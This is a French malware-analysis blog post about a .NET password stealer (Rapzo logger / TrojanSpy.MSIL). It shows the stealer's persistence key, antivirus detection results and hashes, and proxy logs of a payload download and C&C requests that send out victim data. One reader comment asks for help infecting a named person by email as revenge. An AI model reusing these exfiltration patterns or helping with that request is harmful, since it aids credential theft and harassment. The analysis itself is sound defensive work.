Rapzo logger et TrojanSpy.MSIL

Une âme charitable a uploadé un malware (je l’en remercie)

Le malware est écrit en Microsoft .NET et ajoute la clef suivante pour se charger :

O4 – HKCU&#92..&#92Run: [Windows Update] C:&#92Documents and Settings&#92Mak&#92Modèles&#92navida.exe

La détection est mauvaise :

File name: navida.exe
Submission date: 2011-01-19 13:44:25 (UTC)
Current status: finished
Result: 3 /43 (7.0%)Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 2011.01.18.00 2011.01.17 –
AntiVir 7.11.1.178 2011.01.19 –
Antiy-AVL 2.0.3.7 2011.01.18 –
Avast 4.8.1351.0 2011.01.19 –
Avast5 5.0.677.0 2011.01.19 –
AVG 10.0.0.1190 2011.01.19 PSW.Agent.AKHV
BitDefender 7.2 2011.01.19 –
CAT-QuickHeal 11.00 2011.01.19 –
ClamAV 0.96.4.0 2011.01.19 –
Commtouch 5.2.11.5 2011.01.19 –
Comodo 7442 2011.01.19 –
DrWeb 5.0.2.03300 2011.01.19 –
Emsisoft 5.1.0.1 2011.01.19 –
eSafe 7.0.17.0 2011.01.18 –
eTrust-Vet 36.1.8108 2011.01.19 –
F-Prot 4.6.2.117 2011.01.18 –
F-Secure 9.0.16160.0 2011.01.19 –
Fortinet 4.2.254.0 2011.01.16 –
GData 21 2011.01.19 –
Ikarus T3.1.1.97.0 2011.01.19 –
Jiangmin 13.0.900 2011.01.19 –
K7AntiVirus 9.77.3570 2011.01.18 –
Kaspersky 7.0.0.125 2011.01.19 –
McAfee 5.400.0.1158 2011.01.19 –
McAfee-GW-Edition 2010.1C 2011.01.19 –
Microsoft 1.6402 2011.01.19 –
NOD32 5799 2011.01.19 a variant of MSIL/Agent.AT
Norman 6.06.12 2011.01.18 –
nProtect 2011-01-18.01 2011.01.18 –
Panda 10.0.2.7 2011.01.18 –
PCTools 7.0.3.5 2011.01.19 –
Prevx 3.0 2011.01.19 –
Rising 22.83.02.00 2011.01.19 –
Sophos 4.61.0 2011.01.19 –
SUPERAntiSpyware 4.40.0.1006 2011.01.19 –
Symantec 20101.3.0.103 2011.01.19 –
TheHacker 6.7.0.1.116 2011.01.18 –
TrendMicro 9.120.0.1004 2011.01.19 –
TrendMicro-HouseCall 9.120.0.1004 2011.01.19 –
VBA32 3.12.14.2 2011.01.18 –
VIPRE 8123 2011.01.19 Trojan.Win32.Malware (fs)
ViRobot 2011.1.19.4263 2011.01.19 –
VirusBuster 13.6.153.0 2011.01.19 –
Additional informationShow all
MD5   : c8cd3769a13dd57ac61ca2d677c85d1d
SHA1  : d87c181e66f1eee402b4cc70e25bd99111b34302
SHA256: 119f42c683d4c2e4d5699e19abe8d60cce6378d9033dcd35b401f21b0c7e4eea

Les connexions HTTP :

1296128073.425   2729 192.168.1.27 TCP_MISS/200 31740 GET http://premiumxzone.co.cc/files/nircmdc.exe – DIRECT/67.23.226.139 application/x-msdownload

Les connexions aux C&C :

1296128073.942    309 192.168.1.27 TCP_MISS/301 639 GET http://whatismyip.com/automation/n09230945.asp – DIRECT/72.233.89.197 text/html
1296128074.285    320 192.168.1.27 TCP_MISS/200 404 GET http://www.whatismyip.com/automation/n09230945.asp – DIRECT/72.233.89.198 text/html
1296128074.801    436 192.168.1.27 TCP_MISS/200 1941 GET http://ip-address.domaintools.com/myip.xml – DIRECT/66.249.17.251 text/xml
1296128076.942    423 192.168.1.27 TCP_MISS/200 1941 GET http://ip-address.domaintools.com/myip.xml – DIRECT/66.249.17.251 text/xml
1296128077.233    289 192.168.1.27 TCP_MISS/503 291 GET http://whatismyip.com/automation/n09230945.asp – DIRECT/72.233.89.200 text/html
1296128077.673    561 192.168.1.27 TCP_MISS/302 979 GET http://loggsto.x10.bz/rat/users.php?action=add&data=%20(%20%20)%20%7C83.202.61.36%7CMak%7CMAKKK%7CMicrosoft%20Windows%20XP%20Professio
nal%7CIntel(R)%20Core(TM)%20i7%20CPU%20%20%20%20%20%20%20%20%20920%20%20@%202.67GHz%7C1.0 – DIRECT/69.175.120.122 text/html
1296128077.918    244 192.168.1.27 TCP_MISS/301 341 GET http://loggsto.x10.bz/cgi-sys/suspendedpage.cgi?action=add&data=%20(%20%20)%20%7C83.202.61.36%7CMak%7CMAKKK%7CMicrosoft%20Windows%20XP
%20Professional%7CIntel(R)%20Core(TM)%20i7%20CPU%20%20%20%20%20%20%20%20%20920%20%20@%202.67GHz%7C1.0 – DIRECT/69.175.120.122 text/html
1296128098.912  21225 192.168.1.27 TCP_MISS/302 623 GET http://loggsto.x10.bz/rat/index.php?action=read – DIRECT/69.175.120.122 text/html
1296128099.063    151 192.168.1.27 TCP_MISS/301 341 GET http://loggsto.x10.bz/cgi-sys/suspendedpage.cgi?action=read – DIRECT/69.175.120.122 text/html
1296128100.112    163 192.168.1.27 TCP_MISS/302 623 GET http://loggsto.x10.bz/rat/index.php?action=read – DIRECT/69.175.120.122 text/html
1296128100.261    148 192.168.1.27 TCP_MISS/301 341 GET http://loggsto.x10.bz/cgi-sys/suspendedpage.cgi?action=read – DIRECT/69.175.120.122 text/html
1296128101.325    171 192.168.1.27 TCP_MISS/302 623 GET http://loggsto.x10.bz/rat/index.php?action=read – DIRECT/69.175.120.122 text/html

Le fichier téléchargé nircmdc.exe est mieux détécté (Voir post de Malwarebot : http://forum.malekal.com/http-premiumxzone-files-nircmdc-exe-t31126.html ) et est détecté en  TrojanSpy.MSIL.
Le nom MSIL a attiré mon attention pour l’avoir pas mal croisé ces derniers temps sur les forums.

L’indicatif Spy/PWD indique que nous avons affaire à un Trojan de type Stealer comme le confirme les captures ci-dessous.

Rapzo Logger et TrojanSpy.MSIL

Rapzo Logger et TrojanSpy.MSIL

Rapzo Logger et TrojanSpy.MSIL

L’url contactée qui va chercher TrojanSpy.MSIL est open :

Rapzo Logger et TrojanSpy.MSIL

Chose amusante on y a trouve un fichier gif animé qui montre les performance du malware : http://www.malekal.com/fichiers/spywares/TrojanSpy.MSIL.gif

Rapzo Logger et TrojanSpy.MSIL

Rapzo étant le programme qui permet de récupérer les mots de passe :

Rapzo Logger et TrojanSpy.MSIL

Chose étonnante, cela correspond à un topic du forum où une personne se plaind que « quelqu’un » lui change ses mots de passe : Mot de passe qui change..

Cela montre comment l’accès à des trojans restent assez simples et où n’importe qui peut s’attaquer facilement à des personnes qui ne sont pas férus d’informatique.
Rien de vraiment extraordinaire pour ce malware mais ça méritait un post pour expliquer que le vol de mot de passe reste une chose facile dès lors qu’on a un minimum de bagage informatique qui permet de comprendre le fonctionnement du Trojan.

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 5 times, 1 visits today)

3 thoughts on “Rapzo logger et TrojanSpy.MSIL

  1. Heu avec le gif animé en prenant des captures d’écran ou en le ralentissant on peut récupérer des données confidentielles sur des comptes privées xD il faudrait pas faire gaffe ?

  2. Mettez ce stealer dans une VM, un petit wireshark et zou !

    Vous avez le login du ftp ou sont renvoyées les logs.

    Et si le stealer passe par gmail, ya des moyen pour intercepter le SSL

  3. Bonsoir,

    Je suis désolé de vous demander ça mais un mec m’a cassé les C***** via mail en m’insultant gratuitement, avec des propos raciste et tout et tout!!!

    J’aimerai le pourrir bien comme il faut le problème est que je n’ai aucune idée de comment faire, apparement ici il y a des personnes douées, je vous son adresse mail et après vous faite ce que vous voulez à la limite je peux récupérer un fichier style photo qui serai infecté et je lui envoie, car il veut me rencontrer pour se fight de quoi bien rigoler en étant pas un grand nerveux je préfére le faire un peu chier le faire galérer quoi, je vous donne son adresse mail tenez moi au courant je vous remercie : temsi94120@hotmail.fr

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *